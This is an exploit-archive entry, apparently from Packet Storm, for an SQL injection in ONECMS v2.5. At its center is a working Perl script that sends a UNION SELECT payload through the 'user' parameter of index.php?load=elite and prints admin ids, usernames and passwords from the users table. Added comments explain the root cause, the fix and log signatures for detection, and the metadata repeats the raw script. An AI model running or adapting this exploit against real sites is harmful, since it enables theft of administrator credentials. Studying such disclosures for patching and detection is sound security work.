ID PACKETSTORM:86929
Type packetstorm
Reporter Ctacok
Modified 2010-03-05T00:00:00
Description
`
# Exploit Title: ONECMS v2.5 SQL INJECTION
# Date: 05.03.2010
# Author: Ctacok and .:[melkiy]:.
# Software Link: http://sourceforge.net/projects/onecms/
# Version: 2.5
# Tested on: Ubuntu 9.10 Apache2+PHP5
#!/usr/bin/perl
# Proof-of-concept for a SQL injection in ONECMS v2.5: the `user` query
# parameter of index.php?load=elite is sent with a UNION SELECT payload and
# the response page is searched for the leaked row.
#
# Reviewer notes (defensive reading of this PoC):
#   - Root cause, as far as the payload shows: the leading `'` is meant to
#     close a quoted SQL string, so `user` presumably reaches the query by
#     string concatenation without escaping -- confirm against the ONECMS
#     source. The fix is a parameterized query (prepared statement) for that
#     lookup, not input filtering.
#   - The banner's "Magic_quotes = Off" precondition means the application
#     relied on PHP magic_quotes for escaping. That setting was removed in
#     PHP 5.4, so it cannot be treated as a mitigation.
#   - Detection: web-server logs showing index.php requests with load=elite
#     whose `user` value contains a quote, `union+select`, or
#     `concat(0x3a3a3a`; responses containing `:::`-delimited fields.
#   - The query reads the `password` column directly; whether it holds a
#     hash or plaintext is not visible here. Credentials in that table should
#     be rotated if such requests appear in logs.
use LWP::Simple;
print "\n";
print "##############################################################\n";
print "# ONECMS v2.5 SQL INJECTION #\n";
print "# Bug founded by: .:[melkiy]:. #\n";
print "# Exploit coded by: Ctacok #\n";
print "# Special for Antichat (forum.antichat.ru) #\n";
print "# Require : Magic_quotes = Off #\n";
print "##############################################################\n";
# Only two arguments are required by this check, although a third (the table
# prefix) is read below and shown in the example line.
if (@ARGV < 2)
{
print "\n Usage: exploit.pl [host] [path] ";
print "\n EX : exploit.pl www.localhost.com /path/ prefix \n\n";
exit;
}
$host=$ARGV[0];
$path=$ARGV[1];
$prefix=$ARGV[2]; # table-name prefix; the author notes the default is "onecms", but no default is applied here
# Payload: `-2'` ends the original string literal, then an 11-column UNION
# SELECT places concat(":::", id, ":", username, ":", password, ":::") in
# column 9 (0x3a3a3a is ":::", 0x3a is ":"), read from <prefix>_users.
$vuln = "-2'+union+select+1,2,3,4,5,6,7,8,concat(0x3a3a3a,id,0x3a,username,0x3a,password,0x3a3a3a),10,11+from+".$prefix."_users";
# The trailing `+--+` is a SQL comment that cuts off the rest of the original
# statement. get() is LWP::Simple's fetch and returns undef on failure; that
# case is not checked here.
$doc = get($host.$path."index.php?load=elite&user=".$vuln."+--+");
# Pull the three colon-separated fields out from between the ":::" markers.
# The second field is the `username` column, despite the "email" label below.
# The query has no WHERE clause, so "Admin" is the author's assumption about
# which row the page renders.
if ($doc =~ /:::(.+):(.+):(.+):::/){
print "\n[+] Admin id: : $1";
print "\n[+] Admin email: $2";
print "\n[+] Admin password: $3";
}
`
{"reporter": "Ctacok", "enchantments": {"score": {"vector": "NONE", "value": 7.5}, "dependencies": {"references": [], "modified": "2016-11-03T10:28:27"}, "vulnersScore": 7.5}, "published": "2010-03-05T00:00:00", "cvelist": [], "lastseen": "2016-11-03T10:28:27", "history": [], "id": "PACKETSTORM:86929", "sourceHref": "https://packetstormsecurity.com/files/download/86929/onecmsv25-sql.txt", "objectVersion": "1.2", "sourceData": "` \n \n# Exploit Title: ONECMS v2.5 SQL INJECTION \n# Date: 05.03.2010 \n# Author: Ctacok and .:[melkiy]:. \n# Software Link: http://sourceforge.net/projects/onecms/ \n# Version: 2.5 \n# Tested on: Ubuntu 9.10 Apache2+PHP5 \n \n#!/usr/bin/perl \nuse LWP::Simple; \nprint \"\\n\"; \nprint \"##############################################################\\n\"; \nprint \"# ONECMS v2.5 SQL INJECTION #\\n\"; \nprint \"# Bug founded by: .:[melkiy]:. #\\n\"; \nprint \"# Exploit coded by: Ctacok #\\n\"; \nprint \"# Special for Antichat (forum.antichat.ru) #\\n\"; \nprint \"# Require : Magic_quotes = Off #\\n\"; \nprint \"##############################################################\\n\"; \nif (@ARGV < 2) \n{ \nprint \"\\n Usage: exploit.pl [host] [path] \"; \nprint \"\\n EX : exploit.pl www.localhost.com /path/ prefix \\n\\n\"; \nexit; \n} \n$host=$ARGV[0]; \n$path=$ARGV[1]; \n$prefix=$ARGV[2]; # PREFIX TABLES, Default: onecms \n$vuln = \"-2'+union+select+1,2,3,4,5,6,7,8,concat(0x3a3a3a,id,0x3a,username,0x3a,password,0x3a3a3a),10,11+from+\".$prefix.\"_users\"; \n$doc = get($host.$path.\"index.php?load=elite&user=\".$vuln.\"+--+\"); \nif ($doc =~ /:::(.+):(.+):(.+):::/){ \nprint \"\\n[+] Admin id: : $1\"; \nprint \"\\n[+] Admin email: $2\"; \nprint \"\\n[+] Admin password: $3\"; \n} \n \n \n_________________________________________________________________ \n\u0423\u0441\u0442\u0430\u043b\u0438 \u043e\u0442 \u0421\u041f\u0410\u041c\u0430 \u043d\u0430 \u0440\u0430\u0431\u043e\u0447\u0435\u043c \u043c\u0435\u0441\u0442\u0435? 
\u0412\u043e\u0437\u044c\u043c\u0438\u0442\u0435 \u0440\u0435\u0448\u0435\u043d\u0438\u0435 \u043e\u0442 NextMail: \nhttp://www.nextcorp.ru/corp/virt.phtml \n \n \n \n`\n", "cvss": {"vector": "NONE", "score": 0.0}, "description": "", "references": [], "edition": 1, "title": "ONECMS 2.5 SQL Injection", "type": "packetstorm", "modified": "2010-03-05T00:00:00", "hash": "8f8fdc2c91fa3ab102c89fc18001cf5cc683fea56f36166f3ccb11f6c37fc4d0", "bulletinFamily": "exploit", "hashmap": [{"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvelist"}, {"hash": "d4be9c4fc84262b4f39f89565918568f", "key": "cvss"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "description"}, {"hash": "44b10877f59a84f424d8519827885db1", "key": "href"}, {"hash": "167fe00b1cbcca8c82fb65926b5a9343", "key": "modified"}, {"hash": "56765472680401499c79732468ba4340", "key": "objectVersion"}, {"hash": "167fe00b1cbcca8c82fb65926b5a9343", "key": "published"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "99e014653710550af088ff33d5579092", "key": "reporter"}, {"hash": "0ae68a74e393c966ca558ef2a9f6d718", "key": "sourceData"}, {"hash": "9085c3784533d974c4959b1e32ab83d9", "key": "sourceHref"}, {"hash": "49612da65567d913bafec5a0880f7370", "key": "title"}, {"hash": "6466ca3735f647eeaed965d9e71bd35d", "key": "type"}], "href": "https://packetstormsecurity.com/files/86929/ONECMS-2.5-SQL-Injection.html", "viewCount": 0}
{}